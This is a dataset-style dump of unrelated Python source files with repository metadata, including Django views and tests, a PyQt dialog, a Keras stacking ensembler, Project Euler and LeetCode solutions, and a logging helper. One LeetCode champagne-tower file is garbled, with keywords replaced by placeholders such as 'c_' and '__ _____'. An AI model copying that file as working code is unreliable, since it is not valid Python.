| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 143
|
py
|
from django.conf.urls.defaults import *
urlpatterns = patterns('seivanheidari.flatpage_extended.views',
(r'^(?P<url>.*)$', 'flatpage'),
)
|
[
"seivan@kth.se"
] |
seivan@kth.se
|
1327e5c7a206f319618cd37031e6f11e523d0d80
|
e942ac062e2a217735e37e9133dccb26cef4184e
|
/clawer/clawer/apis/user.py
|
9075d355b517f009b0dba4d10e7ca64c986b7f2a
|
[] |
no_license
|
xcctbys/crawl
|
11cc432b39866c5965d7511ff03cb45607db2244
|
95a5b590a82f20a22731b31dfe551a35b4b31fa1
|
refs/heads/master
| 2021-01-21T20:42:45.734344
| 2016-06-28T02:38:19
| 2016-06-28T02:38:19
| 92,269,774
| 2
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,978
|
py
|
#coding=utf-8
import json
import hashlib
import datetime
from django.contrib.auth import authenticate
from django.contrib.auth.models import User as DjangoUser, Group
from django.contrib.auth import login as djangologin
from django.contrib.auth import logout as djangologout
from django.core import exceptions
from django.core.urlresolvers import reverse
from django.utils.encoding import smart_unicode
from html5helper.decorator import render_json
from clawer.utils import check_auth_for_api
from clawer.models import UserProfile, MenuPermission
@render_json
def login(request):
username = request.GET.get("username")
password = request.GET.get("password")
if request.user.is_authenticated():
{"is_ok":True, "profile":request.user.get_profile().as_json()}
user = authenticate(username=username, password=password)
if not user:
return {"is_ok":False, "reason":u"用户不存在或密码错误"}
if user.is_superuser and user.is_staff and user.is_active:
djangologin(request, user)
return {"is_ok":True, "profile":user.get_profile().as_json()}
if MenuPermission.has_perm_to_enter(user) == False:
return {'is_ok':False, "reason":u"权限不足"}
djangologin(request, user)
return {"is_ok":True, "profile":user.get_profile().as_json()}
@render_json
@check_auth_for_api
def keepalive(request):
return {"is_ok":True, "profile":request.user.get_profile().as_json()}
@render_json
def logout(request):
djangologout(request)
return {"is_ok":True}
@render_json
@check_auth_for_api
def get_my_menus(request):
return MenuPermission.user_menus(request.user)
@render_json
def is_logined(request):
request.session["to"] = request.GET.get("to") or ""
if request.user.is_authenticated() is False:
result = {"is_ok":False}
return result
result = {"is_ok":True, "profile":request.user.get_profile().as_json()}
return result
|
[
"xiaotaop@princetechs.com"
] |
xiaotaop@princetechs.com
|
9759de82b067631295a9df8a9613f0a5f0fb3f71
|
7c06182477f708693a39bb450d096291eaa2b89d
|
/ui/ui_Dialog.py
|
7376538b222fc77fad5b7161592cef7708cdc146
|
[] |
no_license
|
Kracav4ik/zk3v
|
dee7414a007bc32833ca6ec31a4acdb505b6de5d
|
febd7b1f8f889355fccede96a68b4a5de425cc89
|
refs/heads/master
| 2020-07-02T19:21:19.239014
| 2020-02-07T20:42:28
| 2020-02-07T20:42:28
| 201,636,973
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,959
|
py
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ui\dialog.ui'
#
# Created by: PyQt5 UI code generator 5.12.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(270, 90)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(Dialog.sizePolicy().hasHeightForWidth())
Dialog.setSizePolicy(sizePolicy)
Dialog.setMaximumSize(QtCore.QSize(270, 90))
self.verticalLayout = QtWidgets.QVBoxLayout(Dialog)
self.verticalLayout.setObjectName("verticalLayout")
self.label = QtWidgets.QLabel(Dialog)
self.label.setObjectName("label")
self.verticalLayout.addWidget(self.label)
self.comboBox = QtWidgets.QComboBox(Dialog)
self.comboBox.setEditable(True)
self.comboBox.setObjectName("comboBox")
self.verticalLayout.addWidget(self.comboBox)
self.buttonBox = QtWidgets.QDialogButtonBox(Dialog)
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
self.buttonBox.setObjectName("buttonBox")
self.verticalLayout.addWidget(self.buttonBox)
self.retranslateUi(Dialog)
self.buttonBox.accepted.connect(Dialog.accept)
self.buttonBox.rejected.connect(Dialog.reject)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Change server address"))
self.label.setText(_translate("Dialog", "Type your address and port"))
|
[
"dikama2013@yandex.ru"
] |
dikama2013@yandex.ru
|
faeac85f38f5106c670b705a87a72d830f2d7a29
|
341446cb13aa6a09bc10bc6525a339e3b1cd45f2
|
/ensembler.py
|
86ffe14b04082f6d650564851ee1d6d14d077a6e
|
[] |
no_license
|
seamusl/OpenNAS-v1
|
ca86cfc6d7486a3c53103f2be260a6468afb7ccc
|
8983ab8cf5b7cf39c8fb1c6709cddb9944fcf46f
|
refs/heads/master
| 2023-03-25T12:54:23.976658
| 2021-01-10T20:03:00
| 2021-01-10T20:03:00
| 264,767,562
| 0
| 0
| null | 2021-03-25T23:45:49
| 2020-05-17T22:20:21
|
Python
|
UTF-8
|
Python
| false
| false
| 5,691
|
py
|
# Copyright (c) 2020 Seamus Lankford
# Licensed under MIT License
import warnings
warnings.simplefilter(action='ignore')
from keras.utils import to_categorical
from sklearn.metrics import accuracy_score
import tensorflow as tf
from tensorflow.keras.models import load_model
import numpy as np
import matplotlib.pyplot as plt
import joblib
from pre_processor import pre_processor
import config as cfg
def fit_model(ui):
print("Compiling model...") # initialize the optimizer and model
opt = tf.keras.optimizers.SGD(lr=0.0001)
model = load_model(ui.m_name) # LOAD autonas base model
print(model.summary())
config = model.to_json()
loaded_model = tf.keras.models.model_from_json(config)
loaded_model.compile(loss="sparse_categorical_crossentropy", optimizer=opt, metrics=["accuracy"])
print("Training base learner...") # train the network
loaded_model.fit(trainX, trainY, validation_data=(testX, testY),
batch_size=32, epochs=ui.epochs, verbose=2)
return loaded_model
def load_models(num_models): # load models from disk
all_models = list()
for i in range(num_models):
filename = 'model_' + str(i + 1) + '.h5' # filename for this ensemble
model = tf.keras.models.load_model(filename) # load model from the file
all_models.append(model) # add model to the list
print('Loaded %s' % filename)
return all_models
def stacked_dataset(members, inputX):
stackX = None # initially no layers in stack
for model in members:
y_pred = model.predict(inputX, verbose=0) # make prediction
if stackX is None: # stack predictions into [rows, members, probabilities]
stackX = y_pred # add first layer to stack
else:
stackX = np.dstack((stackX, y_pred)) # add new layer to stack
# flatten predictions to [rows, members x probabilities]
stackX = stackX.reshape((stackX.shape[0], stackX.shape[1]*stackX.shape[2]))
return stackX
def stacked_prediction(members, model, inputX): # make a prediction with the stacked model
stackedX = stacked_dataset(members, inputX) # create dataset using ensemble
y_pred = model.predict(stackedX) # make predictions
return y_pred
# Using ensemble outputs, create stacked training dataset for meta learner.
# feed outputs from ensemble base learners and fit a meta learner.
def fit_stacked_model(members, inputX, inputy, algorithm):
# create meta learner data set using ensemble base learner predictions. The features of the new data set
# returned, stackedX, are simply the predictions of each of the base learners for each instance. Therefore
# more base learners => greater number of features in the new data set. stackedX and inputy (i.e. the
# corresponding correct label outputs are used to fit a new model with the chosen classifier.
stackedX = stacked_dataset(members, inputX) # create data set from ensemble base learners
# start of Phase B
model = algorithm # assign user defined model algorithm for training
# fit using aggregate feature data from base learners and output labels
model.fit(stackedX, inputy)
return model
def ensemble_classifiers(base_learners, ui):
testYc = to_categorical(testY)
# evaluate standalone models on test set
# performance of standalone models can be compared with ensemble performance
for model in base_learners:
_, acc = model.evaluate(testX, testYc, verbose=0)
print('Model Accuracy: %.4f' % acc)
results = []
names = []
for name, meta in cfg.meta_learners: # evaluate multiple classifier models
print("Training meta learner with ", meta, "...") # train the meta learner wi
# th its own data set
# fit stacked model using the ensemble
model = fit_stacked_model(base_learners, testX, testY, meta)
# evaluate meta learner on test set
y_pred = stacked_prediction(base_learners, model, testX)
acc = accuracy_score(y_pred, testY)
results.append(acc)
names.append(name)
print('Ensemble Meta learner Test Accuracy: %.4f' % acc)
# since we are using a sci-kit learn classifier (and not keras), use joblib library to store model
filename = 'model_' + str(name) + '.sav' # save the model to disk
joblib.dump(model, filename)
print('Saved %s' % filename)
plt.figure(figsize=(9, 3))
plt.subplot(132)
plt.scatter(names, results)
plt.suptitle('Algorithm Comparison')
plt.savefig('ensemble_comparison.png')
return
def create_base_learners(ui):
# fit each base learner with same dataset and save models
# weights of each model randomly initialised
# => different base learner model saved with each iteration
for i in range(ui.n_base):
H = fit_model(ui)
filename = 'model_' + str(i + 1) + '.h5'
H.save(filename) # save model
print('Saved %s' % filename)
return
def ensemble(ui):
global trainX, trainY, testX, testY # these globals only needed within ensemble module
print("[INFO] pre-processing", ui.dataset, "...")
trainX, trainY, testX, testY = pre_processor(ui)
if ui.learners:
create_base_learners(ui)
# train meta-learner using predictions from base learners
base_learners = load_models(ui.n_base) # load all models
print('Loaded %d models' % len(base_learners)) # check if all base learner models loaded
ensemble_classifiers(base_learners, ui)
return
|
[
"noreply@github.com"
] |
seamusl.noreply@github.com
|
a75ddc8ce256a732867b2936e5cbaf3093f8f37b
|
41f94396e4f5e61d2c3a1c684bc0b08d4e426b58
|
/practice2.py
|
4bd5b772868ad50712a8d398331bb5aa59126160
|
[] |
no_license
|
enochnord/hello-world
|
71a4d2f3a1cbae84f1896c5296a675ffd94907b4
|
19eccd30ccd68d4c619b0676af97b131a26e0286
|
refs/heads/master
| 2020-05-18T14:05:51.242334
| 2020-01-15T19:33:50
| 2020-01-15T19:33:50
| 184,460,847
| 0
| 0
| null | 2019-05-01T18:38:12
| 2019-05-01T18:18:51
| null |
UTF-8
|
Python
| false
| false
| 852
|
py
|
stuff = {'rope': 1, 'torch': 6, 'gold coin': 42, 'dagger': 1, 'arrow': 12}
def displayInventory(inventory):
total_items = 0
for item, quantity in inventory.items():
print(str(quantity)+' '+item)
total_items += quantity
print("Total number of items: "+str(total_items))
displayInventory(stuff)
def addToInventory(inventory, addedItems):
for item in addedItems:
inventory.setdefault(item, 0) #this adds a (defaulted to zero value) key to the inventory dict if it's not already there
inventory[item] += 1 #and this increases that value by one, each time that item appears in the loot list
return inventory
inv = {'gold coin': 42, 'rope': 1}
dragonLoot = ['gold coin', 'dagger', 'gold coin', 'gold coin', 'ruby']
inv = addToInventory(inv, dragonLoot)
displayInventory(inv)
|
[
"noreply@github.com"
] |
enochnord.noreply@github.com
|
0f1563570949b62727a7761f33d868a9e9c786b9
|
98d7d234b105c9fe55d1338d611e427fd8bc3552
|
/autotest_platform/kernel_os_kvm-test/log.py
|
fda93c60b2f273f6229bf5810384b1b2ff409433
|
[] |
no_license
|
jianxiamage/autotest_platform
|
b0af178060c61d0b557e7d85c83c535b585a56c1
|
d5db850e1cf8c1fb5c7c810de1eca9484257975f
|
refs/heads/master
| 2020-05-19T12:45:29.857986
| 2019-05-05T11:34:16
| 2019-05-05T11:34:16
| 185,022,420
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,783
|
py
|
#!/usr/bin/env python
#coding=utf-8
import os
import sys
import logging
#日志等级(level) 描述
#DEBUG 最详细的日志信息,典型应用场景是 问题诊断
#INFO 信息详细程度仅次于DEBUG,通常只记录关键节点信息,用于确认一切都是按照我们预期的那样进行工作
#WARNING 当某些不期望的事情发生时记录的信息(如,磁盘可用空间较低),但是此时应用程序还是正常运行的
#ERROR 由于一个更严重的问题导致某些功能不能正常运行时记录的信息
#CRITICAL 当发生严重错误,导致应用程序不能继续运行时记录的信息
#%Y-%m-%d\ %T
#LOG_FORMAT = "%(asctime)s - %(levelname)s - %(user)s[%(ip)s] - %(message)s"
#DATE_FORMAT = "%m/%d/%Y %H:%M:%S %p"
#For example:
#logging.debug('debug 信息')
#logging.info('info 信息')
#logging.warning('warning 信息')
#logging.error('error 信息')
#logging.critical('critial 信息')
logging.basicConfig(level=logging.INFO, #控制台打印的日志级别
filename='/var/log/kernel_os_kvm_Test.log',
filemode='a', #模式,有w和a,w就是写模式,每次都会重新写日志,覆盖之前的日志
#a是追加模式,默认如果不写的话,就是追加模式
format=
#'%(asctime)s - %(pathname)s[line:%(lineno)d] - %(levelname)s: %(message)s'
'[%(levelname)s : %(asctime)s] : %(message)s',
#datefmt = "%m/%d/%Y %H:%M:%S"
datefmt = "%Y-%m-%d %T"
)
if __name__ == '__main__':
strArgs=sys.argv
|
[
"mazhongzheng@loongson.cn"
] |
mazhongzheng@loongson.cn
|
288a7b08c5cf71f0640230acae8d22b897df5ede
|
e780a5bd72f98ca2513c993d64a85b08578166a6
|
/buildout-cache/eggs/Zope2-2.13.26-py2.7.egg/Testing/custom_zodb.py
|
b59b8c0f0a189811d25e949bf0df349935e37124
|
[] |
no_license
|
vedantc98/Plone-test
|
023246597ffe848e2a49b9f65742ff49127b190b
|
9fd520fc78481e2c0b9b7ec427821e7f961c777e
|
refs/heads/master
| 2021-03-30T22:14:33.368739
| 2018-03-11T19:22:58
| 2018-03-11T19:22:58
| 124,671,713
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,212
|
py
|
import os
import logging
import ZODB
LOG = logging.getLogger('Testing')
def getStorage():
""" Return a storage instance for running ZopeTestCase based
tests. By default a DemoStorage is used. Setting
$TEST_ZEO_HOST/TEST_ZEO_PORT environment variables allows you
to use a ZEO server instead. A file storage can be configured
by settting the $TEST_FILESTORAGE environment variable.
"""
get = os.environ.get
if os.environ.has_key('TEST_ZEO_HOST') and os.environ.has_key('TEST_ZEO_PORT'):
from ZEO.ClientStorage import ClientStorage
zeo_host = get('TEST_ZEO_HOST')
zeo_port = int(get('TEST_ZEO_PORT'))
LOG.info('Using ZEO server (%s:%d)' % (zeo_host, zeo_port))
return ClientStorage((zeo_host, zeo_port))
elif os.environ.has_key('TEST_FILESTORAGE'):
import ZODB.FileStorage
datafs = get('TEST_FILESTORAGE')
LOG.info('Using Filestorage at (%s)' % datafs)
return ZODB.FileStorage.FileStorage(datafs)
else:
from ZODB.DemoStorage import DemoStorage
LOG.info('Using DemoStorage')
return DemoStorage()
Storage = getStorage()
|
[
"vedantc98@gmail.com"
] |
vedantc98@gmail.com
|
4a82493f4fd45a7fd6c13c09e0044536e96d7feb
|
12bf679fe5c13baf581650cc558cd44b63c1a0d2
|
/problem75.py
|
c97dc05dc2da0de7dd2cd9b1a4e62f4c64cadaeb
|
[] |
no_license
|
ganzevoort/project-euler
|
ed119f23cd5b63a6fcd5df6b581513c92d1790f6
|
0fea6b3465272895536b7ed3bff10bf3e0d84154
|
refs/heads/master
| 2022-09-12T16:19:06.696279
| 2022-09-02T17:03:52
| 2022-09-02T17:03:52
| 9,947,769
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,484
|
py
|
"""
https://projecteuler.net/problem=75
Singular integer right triangles
Problem 75
It turns out that 12 cm is the smallest length of wire that can be
bent to form an integer sided right angle triangle in exactly one
way, but there are many more examples.
12 cm: (3,4,5)
24 cm: (6,8,10)
30 cm: (5,12,13)
36 cm: (9,12,15)
40 cm: (8,15,17)
48 cm: (12,16,20)
In contrast, some lengths of wire, like 20 cm, cannot be bent to
form an integer sided right angle triangle, and other lengths allow
more than one solution to be found; for example, using 120 cm it
is possible to form exactly three different integer sided right
angle triangles.
120 cm: (30,40,50), (20,48,52), (24,45,51)
Given that L is the length of the wire, for how many values of
L ≤ 1,500,000 can exactly one integer sided right angle triangle
be formed?
"""
import time
import math
import itertools
import functools
import operator
from collections import defaultdict
from pprint import pprint
import pyprimesieve
def solution1(L=1500000, verbose=False):
t0 = time.time()
# find all a, b, c
# where 0 < a < b
# a**2 + b**2 = c**2
# a + b + c <= L
triangles = defaultdict(list)
for a in range(1, L):
for b in range(a+1, L):
c = math.floor(math.sqrt(a**2 + b**2))
if a**2 + b**2 != c**2:
continue
if a + b + c <= L:
if verbose and isinstance(verbose, int) and verbose>1:
print(f"{a+b+c}cm: ({a},{b},{c})")
triangles[a+b+c].append((a,b,c))
if verbose:
print("s1 L={} {:8}ms phase1".format(
L, int(1000*(time.time()-t0))))
if isinstance(verbose, int) and verbose>1:
pprint(triangles)
result = sum(1 for n in triangles.values() if len(n)==1)
if verbose:
print("s1 L={} {:8}ms result={}".format(
L, int(1000*(time.time()-t0)), result))
return result
def solution2(L=1500000, verbose=False):
t0 = time.time()
# Is math.floor(math.sqrt(a**2 + b**2)) expensive?
# if a + b + c <= L, then c < L/2
root = { c**2: c for c in range(1, L//2) }
if verbose:
print("s2 L={} {:8}ms precalculate roots".format(
L, int(1000*(time.time()-t0))))
triangles = defaultdict(list)
for bsquare, b in root.items():
if verbose and isinstance(verbose, int) and verbose>2:
if b%1000 == 0:
print("s2 L={} {:8}ms b={}".format(
L, int(1000*(time.time()-t0)), b))
for asquare, a in root.items():
if asquare >= bsquare:
break
csquare = asquare + bsquare
if csquare in root:
c = root[csquare]
if a + b + c <= L:
if verbose and isinstance(verbose, int) and verbose>1:
print(f"{a+b+c}cm: ({a},{b},{c})")
triangles[a+b+c].append((a,b,c))
if verbose:
print("s2 L={} {:8}ms phase1".format(
L, int(1000*(time.time()-t0))))
if isinstance(verbose, int) and verbose>1:
pprint(triangles)
result = sum(1 for n in triangles.values() if len(n)==1)
if verbose:
print("s2 L={} {:8}ms result={}".format(
L, int(1000*(time.time()-t0)), result))
return result
def solution3(L=1500000, verbose=False):
"""
for positive integers a, b, c where a < b < c and a² + b² = c²:
let x = b - a, y = c - b
then a² + (a+x)² = (a+x+y)²
a² + a² + 2ax + x² = a² + 2a(x+y) + (x+y)²
a² + a² + 2ax + x² = a² + 2ax + 2ay + x² + 2xy + y²
a² = 2ay + 2xy + y²
y = 1 => a² = 2a + 2x + 1 => x = (a² - 2a - 1)/2 = a²/2 - a - 1/2
x is a positive integer, so a is odd, a >= 3
x | y | a | b | c
-----+-----+-----+-----+-----
1 | 1 | 3 | 4 | 5
7 | 1 | 5 | 12 | 13
17 | 1 | 7 | 24 | 25
31 | 1 | 9 | 40 | 41
49 | 1 | 11 | 60 | 61
y = 2 => a² = 4a + 4x + 4 => x = (a² - 4a - 4)/4 = a²/4 - a - 1
x is a positive integer, so a is even, a >= 6
x | y | a | b | c
-----+-----+-----+-----+-----
2 | 2 | 6 | 8 | 10
7 | 2 | 8 | 15 | 17
14 | 2 | 10 | 24 | 26
23 | 2 | 12 | 35 | 37
34 | 2 | 14 | 48 | 50
y = 3 => a² = 6a + 6x + 9 => x = (a² - 6a - 9)/6 = a²/6 - a - 3/2
x is a positive integer, so a is odd, multiple of 3, a >= 9
x | y | a | b | c
-----+-----+-----+-----+-----
3 | 3 | 9 | 12 | 15
21 | 3 | 15 | 36 | 39
51 | 3 | 21 | 72 | 75
93 | 3 | 27 | 120 | 123
147 | 3 | 33 | 180 | 183
general case:
y > 3 => a² = 2ay + 2xy + y² => x = (a² - 2ay - y²) / 2y = a²/(2y) - a - y/2
if y is odd, a must be odd, a² is a multiple of y
if y is even, a must be even, a² is a multiple of 2y
if y is even, 2y = prod(pi yi) for pi prime, yi integer > 0,
then y' = prod(pi^ceil(yi/2))
then a² is multiple of y iff a is multiple of y'
and a2 is multiple of 2y if a is multiple of y' and p0==2, i0 is odd,
or a is multiple of 2y'
maximal value of y is if c is large, a and b are close.
Then y < (√2 - 1) L / (√2 + 2) < L/8
x > 0, so a² - 2ay - y² > 0, so a² - 2ay > y²
quadratic formula:
ax²+bx+c = 0, then x = (-b±√(b²-4ac))/(2a)
variable substitution: x:a, a:1, b:-2y, c:-y²
a²-2ya-y² = 0, then a = (2y±√(4y²+4y²))/2 = y ± y√2
so, a >= y + y√2
"""
t0 = time.time()
triangles = set()
dups = set()
for y in range(1, L//8):
factorized = pyprimesieve.factorize(y)
y_prime = functools.reduce(
operator.mul,
(p**((i+1)//2) for p,i in factorized),
1
)
if y % 2 == 1:
base = y_prime
step = y_prime * 2
else:
base = y_prime
if factorized[0][0] == 2 and factorized[0][1] % 2 == 0:
base *= 2
step = base
lwb_a = math.ceil(y*(1+math.sqrt(2)))
new_base = math.ceil((lwb_a - base) / step) * step + base
for a in itertools.count(new_base, step):
x = (a*a - 2*a*y - y*y) // (2*y)
b = a + x
c = b + y
l = a + b + c
if l > L:
break
if isinstance(verbose, int) and verbose>2:
print(f"s3 L={L}, x={x} y={y} y'={y_prime} ({a},{b},{c}) {a+b+c}cm")
if l in triangles:
dups.add(l)
else:
triangles.add(l)
if verbose:
print("s3 L={} {:8}ms phase1".format(
L, int(1000*(time.time()-t0))))
if isinstance(verbose, int) and verbose>1:
print("triangles: {}\ndups: {}".format(
",".join(map(str, sorted(triangles))),
",".join(map(str, sorted(dups)))))
result = len(triangles) - len(dups)
if verbose:
print("s3 L={} {:8}ms result={}".format(
L, int(1000*(time.time()-t0)), result))
return result
solution = solution3
if __name__ == '__main__':
solution1(verbose=3, L=120)
solution2(verbose=3, L=120)
solution3(verbose=3, L=120)
solution2(verbose=True, L=10000)
solution3(verbose=True, L=10000)
solution(verbose=True)
|
[
"ganzevoort@gw20e.com"
] |
ganzevoort@gw20e.com
|
84cdbb979c2f212c1dc2187b7c185ec753d0e0d2
|
34053eab55920cd06b90b05c7995d45b3fb279ba
|
/customer/tests/test_views.py
|
8b0dcaba159fb519f8072af98ae429e9bf8412a9
|
[] |
no_license
|
yassinejr/MedicalStoreManagementSystem-Backend
|
bc2706abac3faf8b53ba62fe319e8fa4c55a7057
|
2908560af63b91e8731ae8115272d505cd773c49
|
refs/heads/main
| 2023-03-21T01:04:56.333791
| 2021-03-03T22:47:19
| 2021-03-03T22:47:19
| 338,150,949
| 0
| 0
| null | 2021-03-03T22:47:20
| 2021-02-11T20:57:41
|
Python
|
UTF-8
|
Python
| false
| false
| 1,320
|
py
|
import json
from django.urls import reverse
from rest_framework import status
from .test_setup import TestSetUp
class CustomerTests(TestSetUp):
def test_view_customers(self):
url = reverse('customer:customer-list')
response = self.client.get(url, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_post_customer(self):
url = reverse('customer:customer-list')
response = self.client.post(url, self.data, format='json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_customer_detail(self):
url = reverse('customer:customer-detail', kwargs={"pk": 1})
response = self.client.get(url, format='json')
self.assertEqual(response.data["name"], 'customer zarzis')
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_customer_update(self):
url = reverse('customer:customer-detail', kwargs={"pk": 1})
data = {
'name':'customer djerba',
'phone': 12342255,
'address': 'rue de la paix'
}
response = self.client.put(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(json.loads(response.content)['name'], 'customer djerba')
|
[
"yassine.jrad@esprit.tn"
] |
yassine.jrad@esprit.tn
|
51e79e81fc843cede5de74dd9720d367ac781088
|
51a37b7108f2f69a1377d98f714711af3c32d0df
|
/src/leetcode/P5337.py
|
6b7387cfd3aeebdde97f2bf7f2058c69a7a07da6
|
[] |
no_license
|
stupidchen/leetcode
|
1dd2683ba4b1c0382e9263547d6c623e4979a806
|
72d172ea25777980a49439042dbc39448fcad73d
|
refs/heads/master
| 2022-03-14T21:15:47.263954
| 2022-02-27T15:33:15
| 2022-02-27T15:33:15
| 55,680,865
| 7
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 692
|
py
|
VOWELS = {
'a': 0,
'e': 1,
'i': 2,
'o': 3,
'u': 4,
}
LV = 5
class Solution:
def findTheLongestSubstring(self, s: str) -> int:
d = {0: -1}
n = len(s)
r, t = 0, 0
for i in range(n):
if s[i] in VOWELS:
t ^= 1 << (VOWELS[s[i]])
if t in d:
r = max(r, i - d[t])
else:
d[t] = i
return r
# For test only
SI = (("eleetminicoworoep", ),
("leetcodeisgreat", ),
("bcbcbc", ),
)
SO = (13, 5, 6)
TM = 'findTheLongestSubstring'
if __name__ == '__main__':
from leetcode.PTester import PTester
PTester(SI, SO, Solution, TM).run()
|
[
"stupidchen@foxmail.com"
] |
stupidchen@foxmail.com
|
bd71e8834041355af9994538d8b413ecfd3d17bf
|
747f759311d404af31c0f80029e88098193f6269
|
/addons/invoice_department/__openerp__.py
|
afc156863ffd05e1b0be166b0b4bd23ce538647e
|
[] |
no_license
|
sgeerish/sirr_production
|
9b0d0f7804a928c0c582ddb4ccb7fcc084469a18
|
1081f3a5ff8864a31b2dcd89406fac076a908e78
|
refs/heads/master
| 2020-05-19T07:21:37.047958
| 2013-09-15T13:03:36
| 2013-09-15T13:03:36
| 9,648,444
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 71
|
py
|
/home/openerp/production/extra-addons/invoice_department/__openerp__.py
|
[
"geerish@omerp.net"
] |
geerish@omerp.net
|
4444e9fdf7a521fb5b97b051d6c60e7eb88cedff
|
20674c17d815214bf66b75be686bb8a45c0f5914
|
/version1/41_First_Missing_Positive.py
|
46f175341cad376abe13c15b0427afd35607a259
|
[] |
no_license
|
moontree/leetcode
|
e7b670969fe20785b15aae82996875fd66de1b08
|
f2bf9b13508cd01c8f383789569e55a438f77202
|
refs/heads/master
| 2021-05-20T20:36:45.615420
| 2020-04-02T09:15:26
| 2020-04-02T09:15:26
| 252,408,563
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,159
|
py
|
'''
Given an unsorted integer array, find the first missing positive integer.
For example,
Given [1,2,0] return 3,
and [3,4,-1,1] return 2.
Your algorithm should run in O(n) time and uses constant space.
'''
examples = [
{
"nums" : [1, 2, -1],
"res" : 3
},
{
"nums": [3, 4, -1, 1],
"res" : 2
},
{
"nums": [3, 4, 2, 1],
"res" : 5
},
{
"nums": [-1, -2, -3, 0],
"res" : 1
},
{
"nums": [0, 2, -1, 1],
"res" : 3
},{
'nums': [2],
"res" : 1
},{
'nums': [1, 1],
"res" : 2
},{
'nums': [4, 5],
"res" : 1
},{
'nums': [0, -1, 3, 1],
"res" : 2
}
]
def firstMissingPositive(nums):
"""
:type nums: List[int]
:rtype: int
"""
nums.append(-1)
index = 0
count = len(nums) - 1
while index < count:
if nums[index] == index:
index += 1
else:
while nums[index] != index:
if nums[index] < 1 or nums[index] > count:
nums[index] = 0
break
else:
tmp = nums[index]
if nums[tmp] == tmp:
break
nums[index] = nums[tmp]
nums[tmp] = tmp
index += 1
for i in range(1, count + 1):
if nums[i] != i:
return i
return count + 1
'''
first distribute to 0, n
then if index exists, nums[index] += n,
if not exists, nums[index] keeps < n
'''
def firstMissingPositive(nums):
"""
:type nums: List[int]
:rtype: int
"""
nums.append(0)
n = len(nums)
for i in range(len(nums)):
if nums[i] < 0 or nums[i] >= n:
nums[i] = 0
for i in range(len(nums)):
nums[nums[i] % n] += n
for i in range(1, len(nums)):
if nums[i] < n:
return i
return n
for example in examples:
print '--- test cases ---'
print example
res = firstMissingPositive(example['nums'])
print res == example['res'], res, example['res']
|
[
"zhangchao@zhangchaodeMacBook-Pro.local"
] |
zhangchao@zhangchaodeMacBook-Pro.local
|
65dbaa98b62745d99f56f451abb321eeee0493ad
|
e23a4f57ce5474d468258e5e63b9e23fb6011188
|
/125_algorithms/_exercises/templates/_algorithms_challenges/leetcode/LeetcodePythonProject_with_solution/leetcode_0751_0800/LeetCode799_ChampagneTower.py
|
0aa3fdd38948e8a2234d58be1d63778409f91a00
|
[] |
no_license
|
syurskyi/Python_Topics
|
52851ecce000cb751a3b986408efe32f0b4c0835
|
be331826b490b73f0a176e6abed86ef68ff2dd2b
|
refs/heads/master
| 2023-06-08T19:29:16.214395
| 2023-05-29T17:09:11
| 2023-05-29T17:09:11
| 220,583,118
| 3
| 2
| null | 2023-02-16T03:08:10
| 2019-11-09T02:58:47
|
Python
|
UTF-8
|
Python
| false
| false
| 1,206
|
py
|
'''
Created on Apr 18, 2018
@author: tongq
'''
c_ Solution(o..
___ champagneTower poured, query_row, query_glass
"""
:type poured: int
:type query_row: int
:type query_glass: int
:rtype: float
"""
result [[0.0]*101 ___ _ __ r..(101)]
? 0 0 poured
___ i __ r..(100
___ j __ r..(i+1
__ result[i][j] >_ 1:
result[i+1][j] += (result[i][j]-1)/2.0
result[i+1][j+1] += (result[i][j]-1)/2.0
result[i][j] 1.0
r.. ?[query_row][query_glass]
___ test
testCases [
[1, 1, 1], # 0.0
[2, 1, 1], # 0.5
[2, 1, 0], # 0.5
[6, 2, 0],
[6, 2, 1],
[6, 3, 1],
[6, 3, 0]
]
___ poured, query_row, query_glass __ testCases:
print('poured: %s' % poured)
print('query_row: %s' % query_row)
print('query_glass: %s' % query_glass)
result champagneTower(poured, query_row, query_glass)
print('result: %s' % result)
print('-='*30+'-')
__ _____ __ _____
Solution().test()
|
[
"sergejyurskyj@yahoo.com"
] |
sergejyurskyj@yahoo.com
|
8aade5817b19ff2fa35eb58b3c891b4d8f7781e4
|
7212600f89c640bd4a936934f8bed985acd3e2d5
|
/cgi-bin/filewriter.py
|
8a16b35e0c58429ddeda1e08a01605d0c3b1cbf8
|
[] |
no_license
|
SkyPromp/Speedcube-timer
|
3bac6b242886654168919f2ca351b858e4c5dd1f
|
41c5859844e73aced035f626df5dc71a388b1ade
|
refs/heads/main
| 2023-06-04T04:44:34.095363
| 2021-06-27T19:58:16
| 2021-06-27T19:58:16
| 378,777,146
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 677
|
py
|
import datetime
# Append the current date/time, scramble and solving time to the text file
def write(scramble, time):
file = open("times.csv", "a")
file.write(f"{datetime.datetime.now()},{scramble},{time}\n")
file.close()
# Removes the last used line of the file (so removes the empty line, and the used line and then adds another newline)
def remove():
